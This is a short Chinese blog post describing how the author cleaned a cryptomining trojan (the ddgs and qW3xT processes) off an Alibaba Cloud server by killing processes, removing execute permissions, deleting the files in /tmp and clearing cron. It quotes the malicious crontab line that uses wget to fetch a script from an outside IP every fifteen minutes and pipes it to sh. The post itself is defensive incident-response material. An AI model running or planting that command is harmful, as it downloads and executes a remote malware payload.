记录一次阿里云服务器被挖矿木马攻击后的处理

版权声明:本文为博主原创文章,遵循 CC 4.0 by-sa 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013889838/article/details/84338082

周末收到阿里云异常登录的短信提醒,没有理会,周一上线看了眼,cpu占用100%,发现被攻击了。

先修改管理员的登录密码

1.查看top进程 
  发现一个进程qW3xT.3进程占用99.9%的cpu
百度下明显是挖矿病毒程序
kill -9 端口号
杀死之后,会发现一会又启动了
观察top发现有一个守护进程ddgs.3014先启动,然后隐藏

2.查看ddgs进程并杀掉
 ps -aux|grep ddgs
发现执行文件在/tmp目录下

先取消掉执行权限
chmod -x ddgs.3014
chmod -x qW3xT.3

一般这类病毒通过定时任务去下载,没找到根源的情况下,
删除了会重新下载的

留意目录/var/spool/cron 遇到不认识的连接 直接干掉
我的目录下就发现了一个/var/spool/cron/crontabs/root文件

文件内容
*/15 * * * * wget -q -o- http://149.56.106.215:8000/i.sh |sh

很明显的下载病毒的连接,直接删除。

3.删除/tmp 目录下的病毒文件,问题解决

4.查看top,再未发现相应的进程

展开阅读全文

没有更多推荐了,返回首页